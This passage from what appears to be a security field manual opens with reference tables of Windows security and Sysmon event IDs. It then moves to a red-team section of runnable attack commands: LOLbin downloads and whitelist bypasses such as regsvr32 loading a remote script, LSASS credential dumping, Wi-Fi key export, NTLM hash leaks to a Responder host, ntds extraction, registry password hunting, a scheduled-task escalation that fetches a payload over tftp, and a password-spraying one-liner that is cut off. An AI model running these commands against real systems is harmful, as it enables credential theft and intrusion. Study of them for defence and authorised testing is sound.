PRIVILEGE USAGE: 4672, 4673, 4674, 4703, 4768, 4769, 4771
PROCESS EXECUTED: 4688
PROCESS TERMINATED: 4689
FILTERING PLATFORM: 5156
ACCOUNT MGMT: 4720, 4722, 4724, 4726, 4728, 4737, 4738
POLICY CHANGE: 4670, 4904, 4905, 4946, 4947
FILE SHARING: 5140, 5142, 5144, 5145
HANDLES: 4656, 4658, 4659, 4660, 4661, 4663, 4690
VSS: 8222
SYSTEM: 7036, 7040, 7045
APPLICATION: 102, 103, 105, 216, 300, 302, 2001, 2003, 2005, 2006
LOGS CLEARED: 104

EventID DESCRIPTION
1100 The event logging service has shut down
1101 Audit events have been dropped by the transport.
1102 The audit log was cleared
1104 The security Log is now full
1105 Event log automatic backup
1108 The event logging service encountered an error
4608 Windows is starting up
4609 Windows is shutting down
An authentication package has been loaded by the Local
4610 Security Authority
A trusted logon process has been registered with the
4611 Local Security Authority
Internal resources allocated for the queuing of audit
messages have been exhausted, leading to the loss of
4612 some audits.
A notification package has been loaded by the Security
4614 Account Manager.
4615 Invalid use of LPC port
4616 The system time was changed.
4618 A monitored security event pattern has occurred
4621 Administrator recovered system from CrashOnAuditFail
A security package has been loaded by the Local
4622 Security Authority.
4624 An account was successfully logged on
4625 An account failed to log on

340
4626 User/Device claims information
4627 Group membership information.
4634 An account was logged off
4646 IKE DoS-prevention mode started
4647 User initiated logoff
4648 A logon was attempted using explicit credentials
4649 A replay attack was detected
4650 An IPsec Main Mode security association was established
4651 An IPsec Main Mode security association was established
4652 An IPsec Main Mode negotiation failed
4653 An IPsec Main Mode negotiation failed
4654 An IPsec Quick Mode negotiation failed
4655 An IPsec Main Mode security association ended
4656 A handle to an object was requested
4657 A registry value was modified
4658 The handle to an object was closed
A handle to an object was requested with intent to
4659 delete
4660 An object was deleted
4661 A handle to an object was requested
4662 An operation was performed on an object
4663 An attempt was made to access an object
4664 An attempt was made to create a hard link
An attempt was made to create an application client
4665 context.
4666 An application attempted an operation
4667 An application client context was deleted
4668 An application was initialized
4670 Permissions on an object were changed
An application attempted to access a blocked ordinal
4671 through the TBS
4672 Special privileges assigned to new logon
4673 A privileged service was called
4674 An operation was attempted on a privileged object
4675 SIDs were filtered
4688 A new process has been created
4689 A process has exited
4690 An attempt was made to duplicate a handle to an object
4691 Indirect access to an object was requested
4692 Backup of data protection master key was attempted
4693 Recovery of data protection master key was attempted
4694 Protection of auditable protected data was attempted
4695 Unprotection of auditable protected data was attempted
4696 A primary token was assigned to process
4697 A service was installed in the system
4698 A scheduled task was created
4699 A scheduled task was deleted
4700 A scheduled task was enabled
4701 A scheduled task was disabled
4702 A scheduled task was updated

341
4703 A token right was adjusted
4704 A user right was assigned
4705 A user right was removed
4706 A new trust was created to a domain
4707 A trust to a domain was removed
4709 IPsec Services was started
4710 IPsec Services was disabled
4711 PAStore Engine (1%)
IPsec Services encountered a potentially serious
4712 failure
4713 Kerberos policy was changed
4714 Encrypted data recovery policy was changed
4715 The audit policy (SACL) on an object was changed
4716 Trusted domain information was modified
4717 System security access was granted to an account
4718 System security access was removed from an account
4719 System audit policy was changed
4720 A user account was created
4722 A user account was enabled
4723 An attempt was made to change an account's password
4724 An attempt was made to reset an accounts password
4725 A user account was disabled
4726 A user account was deleted
4727 A security-enabled global group was created
4728 A member was added to a security-enabled global group
A member was removed from a security-enabled global
4729 group
4730 A security-enabled global group was deleted
4731 A security-enabled local group was created
4732 A member was added to a security-enabled local group
A member was removed from a security-enabled local
4733 group
4734 A security-enabled local group was deleted
4735 A security-enabled local group was changed
4737 A security-enabled global group was changed
4738 A user account was changed
4739 Domain Policy was changed
4740 A user account was locked out
4741 A computer account was created
4742 A computer account was changed
4743 A computer account was deleted
4744 A security-disabled local group was created
4745 A security-disabled local group was changed
4746 A member was added to a security-disabled local group
A member was removed from a security-disabled local
4747 group
4748 A security-disabled local group was deleted
4749 A security-disabled global group was created
4750 A security-disabled global group was changed
4751 A member was added to a security-disabled global group

342
 A member was removed from a security-disabled global
4752 group
4753 A security-disabled global group was deleted
4754 A security-enabled universal group was created
4755 A security-enabled universal group was changed
A member was added to a security-enabled universal
4756 group
A member was removed from a security-enabled universal
4757 group
4758 A security-enabled universal group was deleted
4759 A security-disabled universal group was created
4760 A security-disabled universal group was changed
A member was added to a security-disabled universal
4761 group
A member was removed from a security-disabled universal
4762 group
4763 A security-disabled universal group was deleted
4764 A groups type was changed
4765 SID History was added to an account
4766 An attempt to add SID History to an account failed
4767 A user account was unlocked
4768 A Kerberos authentication ticket (TGT) was requested
4769 A Kerberos service ticket was requested
4770 A Kerberos service ticket was renewed
4771 Kerberos pre-authentication failed
4772 A Kerberos authentication ticket request failed
4773 A Kerberos service ticket request failed
4774 An account was mapped for logon
4775 An account could not be mapped for logon
The domain controller attempted to validate the
4776 credentials for an account
The domain controller failed to validate the
4777 credentials for an account
4778 A session was reconnected to a Window Station
4779 A session was disconnected from a Window Station
The ACL was set on accounts which are members of
4780 administrators groups
4781 The name of an account was changed
4782 The password hash an account was accessed
4783 A basic application group was created
4784 A basic application group was changed
4785 A member was added to a basic application group
4786 A member was removed from a basic application group
4787 A non-member was added to a basic application group
A non-member was removed from a basic application
4788 group..
4789 A basic application group was deleted
4790 An LDAP query group was created
4791 A basic application group was changed
4792 An LDAP query group was deleted

343
4793 The Password Policy Checking API was called
An attempt was made to set the Directory Services
4794 Restore Mode administrator password
An attempt was made to query the existence of a blank
4797 password for an account
4798 A user's local group membership was enumerated.
A security-enabled local group membership was
4799 enumerated
4800 The workstation was locked
4801 The workstation was unlocked
4802 The screen saver was invoked
4803 The screen saver was dismissed
RPC detected an integrity violation while decrypting an
4816 incoming message
4817 Auditing settings on object were changed.
Proposed Central Access Policy does not grant the same
4818 access permissions as the current Central Access Policy
Central Access Policies on the machine have been
4819 changed
A Kerberos Ticket-granting-ticket (TGT) was denied
because the device does not meet the access control
4820 restrictions
A Kerberos service ticket was denied because the user,
device, or both does not meet the access control
4821 restrictions
NTLM authentication failed because the account was a
4822 member of the Protected User group
NTLM authentication failed because access control
4823 restrictions are required
Kerberos preauthentication by using DES or RC4 failed
because the account was a member of the Protected User
4824 group
A user was denied the access to Remote Desktop. By
default, users are allowed to connect only if they are
members of the Remote Desktop Users group or
4825 Administrators group
4826 Boot Configuration Data loaded
4830 SID History was removed from an account
4864 A namespace collision was detected
4865 A trusted forest information entry was added
4866 A trusted forest information entry was removed
4867 A trusted forest information entry was modified
The certificate manager denied a pending certificate
4868 request
Certificate Services received a resubmitted certificate
4869 request
4870 Certificate Services revoked a certificate
Certificate Services received a request to publish the
4871 certificate revocation list (CRL)

344
 Certificate Services published the certificate
4872 revocation list (CRL)
4873 A certificate request extension changed
4874 One or more certificate request attributes changed.
4875 Certificate Services received a request to shut down
4876 Certificate Services backup started
4877 Certificate Services backup completed
4878 Certificate Services restore started
4879 Certificate Services restore completed
4880 Certificate Services started
4881 Certificate Services stopped
The security permissions for Certificate Services
4882 changed
4883 Certificate Services retrieved an archived key
Certificate Services imported a certificate into its
4884 database
4885 The audit filter for Certificate Services changed
4886 Certificate Services received a certificate request
Certificate Services approved a certificate request and
4887 issued a certificate
4888 Certificate Services denied a certificate request
Certificate Services set the status of a certificate
4889 request to pending
The certificate manager settings for Certificate
4890 Services changed.
4891 A configuration entry changed in Certificate Services
4892 A property of Certificate Services changed
4893 Certificate Services archived a key
4894 Certificate Services imported and archived a key
Certificate Services published the CA certificate to
4895 Active Directory Domain Services
One or more rows have been deleted from the certificate
4896 database
4897 Role separation enabled
4898 Certificate Services loaded a template
4899 A Certificate Services template was updated
4900 Certificate Services template security was updated
4902 The Per-user audit policy table was created
4904 An attempt was made to register a security event source
An attempt was made to unregister a security event
4905 source
4906 The CrashOnAuditFail value has changed
4907 Auditing settings on object were changed
4908 Special Groups Logon table modified
4909 The local policy settings for the TBS were changed
4910 The group policy settings for the TBS were changed
4911 Resource attributes of the object were changed
4912 Per User Audit Policy was changed
4913 Central Access Policy on the object was changed

345
 An Active Directory replica source naming context was
4928 established
An Active Directory replica source naming context was
4929 removed
An Active Directory replica source naming context was
4930 modified
An Active Directory replica destination naming context
4931 was modified
Synchronization of a replica of an Active Directory
4932 naming context has begun
Synchronization of a replica of an Active Directory
4933 naming context has ended
Attributes of an Active Directory object were
4934 replicated
4935 Replication failure begins
4936 Replication failure ends
4937 A lingering object was removed from a replica
The following policy was active when the Windows
4944 Firewall started
4945 A rule was listed when the Windows Firewall started
A change has been made to Windows Firewall exception
4946 list. A rule was added
A change has been made to Windows Firewall exception
4947 list. A rule was modified
A change has been made to Windows Firewall exception
4948 list. A rule was deleted
Windows Firewall settings were restored to the default
4949 values
4950 A Windows Firewall setting has changed
A rule has been ignored because its major version
4951 number was not recognized by Windows Firewall
Parts of a rule have been ignored because its minor
4952 version number was not recognized by Windows Firewall
A rule has been ignored by Windows Firewall because it
4953 could not parse the rule
Windows Firewall Group Policy settings has changed. The
4954 new settings have been applied
4956 Windows Firewall has changed the active profile
4957 Windows Firewall did not apply the following rule
Windows Firewall did not apply the following rule
because the rule referred to items not configured on
4958 this computer
IPsec dropped an inbound packet that failed an
4960 integrity check
IPsec dropped an inbound packet that failed a replay
4961 check
IPsec dropped an inbound packet that failed a replay
4962 check
IPsec dropped an inbound clear text packet that should
4963 have been secured

346
4964 Special groups have been assigned to a new logon
IPsec received a packet from a remote computer with an
4965 incorrect Security Parameter Index (SPI).
During Main Mode negotiation, IPsec received an invalid
4976 negotiation packet.
During Quick Mode negotiation, IPsec received an
4977 invalid negotiation packet.
During Extended Mode negotiation, IPsec received an
4978 invalid negotiation packet.
IPsec Main Mode and Extended Mode security associations
4979 were established.
IPsec Main Mode and Extended Mode security associations
4980 were established
IPsec Main Mode and Extended Mode security associations
4981 were established
IPsec Main Mode and Extended Mode security associations
4982 were established
4983 An IPsec Extended Mode negotiation failed
4984 An IPsec Extended Mode negotiation failed
4985 The state of a transaction has changed
5024 The Windows Firewall Service has started successfully
5025 The Windows Firewall Service has been stopped
The Windows Firewall Service was unable to retrieve the
5027 security policy from the local storage
The Windows Firewall Service was unable to parse the
5028 new security policy.
The Windows Firewall Service failed to initialize the
5029 driver
5030 The Windows Firewall Service failed to start
The Windows Firewall Service blocked an application
5031 from accepting incoming connections on the network.
Windows Firewall was unable to notify the user that it
blocked an application from accepting incoming
5032 connections on the network
5033 The Windows Firewall Driver has started successfully
5034 The Windows Firewall Driver has been stopped
5035 The Windows Firewall Driver failed to start
The Windows Firewall Driver detected critical runtime
5037 error. Terminating
Code integrity determined that the image hash of a file
5038 is not valid
5039 A registry key was virtualized.
A change has been made to IPsec settings. An
5040 Authentication Set was added.
A change has been made to IPsec settings. An
5041 Authentication Set was modified
A change has been made to IPsec settings. An
5042 Authentication Set was deleted
A change has been made to IPsec settings. A Connection
5043 Security Rule was added

347
 A change has been made to IPsec settings. A Connection
5044 Security Rule was modified
A change has been made to IPsec settings. A Connection
5045 Security Rule was deleted
A change has been made to IPsec settings. A Crypto Set
5046 was added
A change has been made to IPsec settings. A Crypto Set
5047 was modified
A change has been made to IPsec settings. A Crypto Set
5048 was deleted
5049 An IPsec Security Association was deleted
An attempt to programmatically disable the Windows
Firewall using a call to
5050 [Link](FALSE
5051 A file was virtualized
5056 A cryptographic self test was performed
5057 A cryptographic primitive operation failed
5058 Key file operation
5059 Key migration operation
5060 Verification operation failed
5061 Cryptographic operation
5062 A kernel-mode cryptographic self test was performed
5063 A cryptographic provider operation was attempted
5064 A cryptographic context operation was attempted
5065 A cryptographic context modification was attempted
5066 A cryptographic function operation was attempted
5067 A cryptographic function modification was attempted
A cryptographic function provider operation was
5068 attempted
A cryptographic function property operation was
5069 attempted
A cryptographic function property operation was
5070 attempted
5071 Key access denied by Microsoft key distribution service
5120 OCSP Responder Service Started
5121 OCSP Responder Service Stopped
A Configuration entry changed in the OCSP Responder
5122 Service
A configuration entry changed in the OCSP Responder
5123 Service
A security setting was updated on OCSP Responder
5124 Service
5125 A request was submitted to OCSP Responder Service
Signing Certificate was automatically updated by the
5126 OCSP Responder Service
The OCSP Revocation Provider successfully updated the
5127 revocation information
5136 A directory service object was modified
5137 A directory service object was created
5138 A directory service object was undeleted

348
5139 A directory service object was moved
5140 A network share object was accessed
5141 A directory service object was deleted
5142 A network share object was added.
5143 A network share object was modified
5144 A network share object was deleted.
A network share object was checked to see whether
5145 client can be granted desired access
5146 The Windows Filtering Platform has blocked a packet
A more restrictive Windows Filtering Platform filter
5147 has blocked a packet
The Windows Filtering Platform has detected a DoS
attack and entered a defensive mode; packets associated
5148 with this attack will be discarded.
The DoS attack has subsided and normal processing is
5149 being resumed.
5150 The Windows Filtering Platform has blocked a packet.
A more restrictive Windows Filtering Platform filter
5151 has blocked a packet.
5152 The Windows Filtering Platform blocked a packet
A more restrictive Windows Filtering Platform filter
5153 has blocked a packet
The Windows Filtering Platform has permitted an
application or service to listen on a port for incoming
5154 connections
The Windows Filtering Platform has blocked an
application or service from listening on a port for
5155 incoming connections
5156 The Windows Filtering Platform has allowed a connection
5157 The Windows Filtering Platform has blocked a connection
The Windows Filtering Platform has permitted a bind to
5158 a local port
The Windows Filtering Platform has blocked a bind to a
5159 local port
5168 Spn check for SMB/SMB2 fails.
5169 A directory service object was modified
A directory service object was modified during a
5170 background cleanup task
5376 Credential Manager credentials were backed up
Credential Manager credentials were restored from a
5377 backup
The requested credentials delegation was disallowed by
5378 policy
5379 Credential Manager credentials were read
5380 Vault Find Credential
5381 Vault credentials were read
5382 Vault credentials were read
The following callout was present when the Windows
5440 Filtering Platform Base Filtering Engine started

349
 The following filter was present when the Windows
5441 Filtering Platform Base Filtering Engine started
The following provider was present when the Windows
5442 Filtering Platform Base Filtering Engine started
The following provider context was present when the
Windows Filtering Platform Base Filtering Engine
5443 started
The following sub-layer was present when the Windows
5444 Filtering Platform Base Filtering Engine started
5446 A Windows Filtering Platform callout has been changed
5447 A Windows Filtering Platform filter has been changed
5448 A Windows Filtering Platform provider has been changed
A Windows Filtering Platform provider context has been
5449 changed
5450 A Windows Filtering Platform sub-layer has been changed
An IPsec Quick Mode security association was
5451 established
5452 An IPsec Quick Mode security association ended
An IPsec negotiation with a remote computer failed
because the IKE and AuthIP IPsec Keying Modules
5453 (IKEEXT) service is not started
PAStore Engine applied Active Directory storage IPsec
5456 policy on the computer
PAStore Engine failed to apply Active Directory storage
5457 IPsec policy on the computer
PAStore Engine applied locally cached copy of Active
5458 Directory storage IPsec policy on the computer
PAStore Engine failed to apply locally cached copy of
5459 Active Directory storage IPsec policy on the computer
PAStore Engine applied local registry storage IPsec
5460 policy on the computer
PAStore Engine failed to apply local registry storage
5461 IPsec policy on the computer
PAStore Engine failed to apply some rules of the active
5462 IPsec policy on the computer
PAStore Engine polled for changes to the active IPsec
5463 policy and detected no changes
PAStore Engine polled for changes to the active IPsec
policy, detected changes, and applied them to IPsec
5464 Services
PAStore Engine received a control for forced reloading
5465 of IPsec policy and processed the control successfully
PAStore Engine polled for changes to the Active
Directory IPsec policy, determined that Active
Directory cannot be reached, and will use the cached
5466 copy of the Active Directory IPsec policy instead
PAStore Engine polled for changes to the Active
Directory IPsec policy, determined that Active
Directory can be reached, and found no changes to the
5467 policy

350
 PAStore Engine polled for changes to the Active
Directory IPsec policy, determined that Active
Directory can be reached, found changes to the policy,
5468 and applied those changes
PAStore Engine loaded local storage IPsec policy on the
5471 computer
PAStore Engine failed to load local storage IPsec
5472 policy on the computer
PAStore Engine loaded directory storage IPsec policy on
5473 the computer
PAStore Engine failed to load directory storage IPsec
5474 policy on the computer
5477 PAStore Engine failed to add quick mode filter
5478 IPsec Services has started successfully
5479 IPsec Services has been shut down successfully
IPsec Services failed to get the complete list of
5480 network interfaces on the computer
IPsec Services failed to initialize RPC server. IPsec
5483 Services could not be started
IPsec Services has experienced a critical failure and
5484 has been shut down
IPsec Services failed to process some IPsec filters on
5485 a plug-and-play event for network interfaces
A request was made to authenticate to a wireless
5632 network
5633 A request was made to authenticate to a wired network
5712 A Remote Procedure Call (RPC) was attempted
5888 An object in the COM+ Catalog was modified
5889 An object was deleted from the COM+ Catalog
5890 An object was added to the COM+ Catalog
Security policy in the group policy objects has been
6144 applied successfully
One or more errors occured while processing security
6145 policy in the group policy objects
6272 Network Policy Server granted access to a user
6273 Network Policy Server denied access to a user
6274 Network Policy Server discarded the request for a user
Network Policy Server discarded the accounting request
6275 for a user
6276 Network Policy Server quarantined a user
Network Policy Server granted access to a user but put
it on probation because the host did not meet the
6277 defined health policy
Network Policy Server granted full access to a user
6278 because the host met the defined health policy
Network Policy Server locked the user account due to
6279 repeated failed authentication attempts
6280 Network Policy Server unlocked the user account
Code Integrity determined that the page hashes of an
6281 image file are not valid...

351
 BranchCache: Received an incorrectly formatted response
6400 while discovering availability of content.
BranchCache: Received invalid data from a peer. Data
6401 discarded.
BranchCache: The message to the hosted cache offering
6402 it data is incorrectly formatted.
BranchCache: The hosted cache sent an incorrectly
formatted response to the client's message to offer it
6403 data.
BranchCache: Hosted cache could not be authenticated
6404 using the provisioned SSL certificate.
6405 BranchCache: %2 instance(s) of event id %1 occurred.
%1 registered to Windows Firewall to control filtering
6406 for the following:
6407 0.01
Registered product %1 failed and Windows Firewall is
6408 now controlling the filtering for %2.
BranchCache: A service connection point object could
6409 not be parsed
Code integrity determined that a file does not meet the
security requirements to load into a process. This
could be due to the use of shared sections or other
6410 issues
6416 A new external device was recognized by the system.
6417 The FIPS mode crypto selftests succeeded
6418 The FIPS mode crypto selftests failed
6419 A request was made to disable a device
6420 A device was disabled
6421 A request was made to enable a device
6422 A device was enabled
The installation of this device is forbidden by system
6423 policy
The installation of this device was allowed, after
6424 having previously been forbidden by policy
8191 Highest System-Defined Audit Message Value

WINDOWS SYSMON LOG EVENTS

ID DESCRIPTION
1 Process creation
2 A process changed a file creation time
3 Network connection
4 Sysmon service state changed
5 Process terminated
6 Driver loaded
7 Image loaded
8 CreateRemoteThread

352
 9 RawAccessRead
10 ProcessAccess
11 FileCreate
12 RegistryEvent (Object create and delete)
13 RegistryEvent (Value Set)
14 RegistryEvent (Key and Value Rename)
15 FileCreateStreamHash
16 Sysmon config state changed
17 Pipe created
18 Pipe connected
19 WmiEventFilter activity detected
20 WmiEventConsumer activity detected
21 WmiEventConsumerToFilter activity detected
225 Error

REFERENCE:
[Link]
analysis/170/download?utm_source=share&utm_medium=ios_app&utm_name=iossmf
[Link]
places-where-you-can-find-evidence
[Link]
[Link]
[Link]
brent-muir
[Link]
[Link]
collection
[Link]

W W
WINDOWS_Exploit
RED TEAM EXPLOITATION WINDOWS

WINDOWS LOLbins
LoLBin is any binary supplied by the operating system that is
normally used for legitimate purposes but can also be abused by
malicious actors. Several default system binaries have unexpected
side effects, which may allow attackers to hide their activities
post-exploitation

EXECUTE LOLbins
[Link] at 07:30 /interactive /every:m,t,w,th,f,s,su
C:\Windows\System32\[Link]

353
[Link] /start [Link]

[Link] -c [Link]

bitsadmin /CREATE 1 & bitsadmin /ADDFILE 1

c:\windows\system32\[Link] c:\data\playfolder\[Link] & bitsadmin
/SetNotifyCmdLine 1 c:\data\playfolder\[Link] NULL & bitsadmin
/RESUME 1 & bitsadmin /RESET

[Link] [Link],RouteTheCall [Link]

[Link] \path\to\[Link]

[Link] -e /mnt/c/Windows/System32/[Link]

DOWNLOAD LOLbins
bitsadmin /CREATE 1 bitsadmin /ADDFILE 1
[Link]
c:\data\playfolder\[Link] bitsadmin /RESUME 1 bitsadmin
/COMPLETE 1

[Link] -urlcache -split -f [Link]

[Link]

[Link] [Link]
#Places download in cache folder

[Link] [Link]
#Places download in cache folder

[Link] [Link]

[Link] \\<[Link]>\path\[Link] c:\path\outdir /A

COPY LOLbins
[Link] /y C:\path\dir\src_example.vbs /d
C:\path\dir\dst_example.vbs /o

expand c:\path\dir\src_example.bat c:\path\dir\dst_example.bat

[Link] C:\path\dir\[Link] C:\path\outdir\ /A

ENCODE LOLbins
certutil -encode input_example.txt encoded_example.txt

354
DECODE LOLbins
certutil -decode encoded_example.txt output_example.txt

APPLICATION WHITELIST BYPASS LOLbins

[Link] -c [Link]

#Executes click-once-application from <URL>

[Link] [Link],ShOpenVerbApplication
[Link]

#Execute the specified remote .SCT script with [Link].

regsvr32 /s /n /u /i:[Link] [Link]

#Execute the specified local .SCT script with [Link].

[Link] /s /u /i:[Link] [Link]

CREDENTIALS LOLbins
#List cached credentials:
cmdkey /list

#Export plaintext local wireless passwords:

netsh wlan export profile key=clear

COMPILE LOLbins
[Link] -out:[Link] [Link]
[Link] -target:library -out:[Link] [Link]

#compile javascript code in [Link] & output [Link].

[Link] [Link]

HASH LEAK LOLbins

DOS COMMANDS
Various Windows commands can allow you to illicit an NTLMv1/v2
authentication leak. Their usefulness in an actual scenario I’ll
leave up to the user.
C:\> dir \\<Responder_IPAddr>\C$
C:\> regsvr32 /s /u /i://<Responder_IPAddr>/blah [Link]
C:\> echo 1 > //<Responder_IPAddr>/blah
C:\> pushd \\<Responder_IPAddr>\C$\blah
C:\> cmd /k \\<Responder_IPAddr>\C$\blah
C:\> cmd /c \\<Responder_IPAddr>\C$\blah
C:\> start \\<Responder_IPAddr>\C$\blah
C:\> mkdir \\<Responder_IPAddr>\C$\blah
C:\> type \\<Responder_IPAddr>\C$\blah
C:\> rpcping -s <Responder_IPAddr> -e 1234 -a privacy -u NTLM

POWERSHELL COMMANDS

355
Various Windows PowerShell commands can allow you to illicit an
NTLMv1/v2 authentication leak. Their usefulness in a scenario I’ll
leave up to the user.
PS> Invoke-Item \\<Responder_IPAddr>\C$\blah
PS> Get-Content \\<Responder_IPAddr>\C$\blah
PS> Start-Process \\<Responder_IPAddr>\C$\blah

DUMP LOLbins
#dump LSASS with rundll32
[Link] C:\Windows\System32\[Link] #24 "<PID> [Link]
full"
[Link] [Link] #24 "<PID> [Link] full"

#dump process pid; requires administrator privileges

[Link] -dumpFull -attach <PID>

#diskshadow to exfiltrate data from VSS such as [Link]

[Link] /s c:\test\[Link]

REFERENCE:
[Link]

WINDOWS PRIVILEGE ESCALATION

Groups on Target System
net localgroup
Get-LocalGroup | ft Name

Users in Administrators Group

net localgroup Administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

User Autologon Registry Entries

reg query "HKLM\SOFTWARE\Microsoft\Windows
NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName
DefaultDomainName DefaultPassword"

Get-ItemProperty -Path
'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\WinLogon' | select "Default*"

List Credential Manager Cache/Locations

cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Get-ChildItem -Hidden
C:\Users\username\AppData\Local\Microsoft\Credentials\

356
Get-ChildItem -Hidden
C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Identify if Target User can access SAM and SYSTEM files

%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Weak folder permissions: Full Permissions Everyone/Users

icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr
"Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr
"Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr
"BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr
"BUILTIN\Users"

Weak folder permissions: Modify Permissions Everyone/Users

icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr
"Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr
"Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr
"BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr
"BUILTIN\Users"

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | %

{ try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select
-ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | %

{ try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select
-ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch
{}}

Processes and services

tasklist /svc
tasklist /v
net start
sc query

Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name

-notlike "svchost*"} | Select Name, Handle,
@{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

357
Unquoted service paths
wmic service get name,displayname,pathname,startmode 2>nul |findstr
/i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v
"""

gwmi -class Win32_Service -Property Name, DisplayName, PathName,

StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -
notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select
PathName,DisplayName,Name

Scheduled Tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks

Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft

TaskName,TaskPath,State

Startup Items
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start
Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start
Menu\Programs\Startup"

Get-CimInstance Win32_StartupCommand | select Name, command,

Location, User | fl
Get-ItemProperty -Path
'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVer
sion\Run'
Get-ItemProperty -Path
'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVer
sion\RunOnce'
Get-ItemProperty -Path
'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVers
ion\Run'
Get-ItemProperty -Path
'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVers
ion\RunOnce'
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"

Network Configuration
ipconfig /all
route print

358
arp -a
netstat -ano
file C:\WINDOWS\System32\drivers\etc\hosts
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh dump

Get-NetIPConfiguration | ft
InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

Get-NetRoute -AddressFamily IPv4 | ft

DestinationPrefix,NextHop,RouteMetric,ifIndex

Get-NetNeighbor -AddressFamily IPv4 | ft

ifIndex,IPAddress,LinkLayerAddress,State

SNMP Configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -

Recurse

Registry Passwords
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s

Image Build Artifacts Credentials

dir /s *[Link] *[Link] *[Link] *[Link]
*[Link] 2>nul

Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -

Recurse -ErrorAction SilentlyContinue | where {($_.Name -like
"*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

User Directories Search Passwords

dir C:\Users\<USER>\ /s *pass* == *vnc* == *.config* 2>nul
findstr C:\Users\ /si password *.xml *.ini *.txt *.config 2>nul

Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -

ErrorAction SilentlyContinue | Select-String -Pattern "password"
Get-ChildItem –Path C:\Users\ -Include *password*,*vnc*,*.config -
File -Recurse -ErrorAction SilentlyContinue

WindowsEnum
[Link]

359
A PowerShell Privilege Escalation Enumeration Script. This script
automates most of what is detailed in
[Link]
Guide/.

#Quick standard checks.

.\WindowsEnum.ps1
#Directly from Terminal
powershell -nologo -executionpolicy bypass -file WindowsEnum.ps1

#Extended checks: search config files, interesting files, &

passwords (be patient).
.\WindowsEnum.ps1 extended
#Directly from Terminal
powershell -nologo -executionpolicy bypass -file WindowsEnum.ps1
extended

Windows Exploit Suggester - Next Generation (WES-NG)

[Link]
WES-NG is a tool based on the output of Windows' systeminfo utility
which provides the list of vulnerabilities the OS is vulnerable to,
including any exploits for these vulnerabilities. Every Windows OS
between Windows XP and Windows 10, including their Windows Server
counterparts, is supported.

#Obtain the latest database of vulnerabilities by executing the

command:
[Link] --update.
#Use Windows' built-in [Link] tool on target host, or
remote system using [Link] /S MyRemoteHost ;to a file:
#Local
systeminfo > [Link]
#Remote
[Link] /S MyRemoteHost > [Link]
#To determine vulns execute WES-NG with the [Link] output
file:
[Link] [Link]
#To validate results use --muc-lookup parameter to validate
identified missing patches against Microsoft's Update Catalog.

360
Windows Scheduler SYSTEM Privilege Escalation Technique
$> net use \\[TargetIP]\ipc$ password /user:username
$> net time \\[TargetIP]
$> at \\[TargetIP] 12:00 pm tftp -I [MyIP] GET [Link]
OR
$> at \\[TargetIP] 12:00 pm C:\Temp\[Link]

PowerSploit
[Link]
#Copy Privesc folder to PowerShell module directory. To find the
directory execute $Env:PSModulePath
#Import the module
Import-Module Privesc
#To run all privesc checks on the system
Invoke-AllChecks

Simple One-liner Password Spraying

#First get users on the domain into a textfile:
net user /domain > [Link]
#Echo passwords into a file:
echo “password1” >> [Link]
echo “Spring2020” >> [Link]
#One-liner script to spray [Link] against [Link]:
@FOR /F %n in ([Link]) DO @FOR /F %p in ([Link]) DO @net
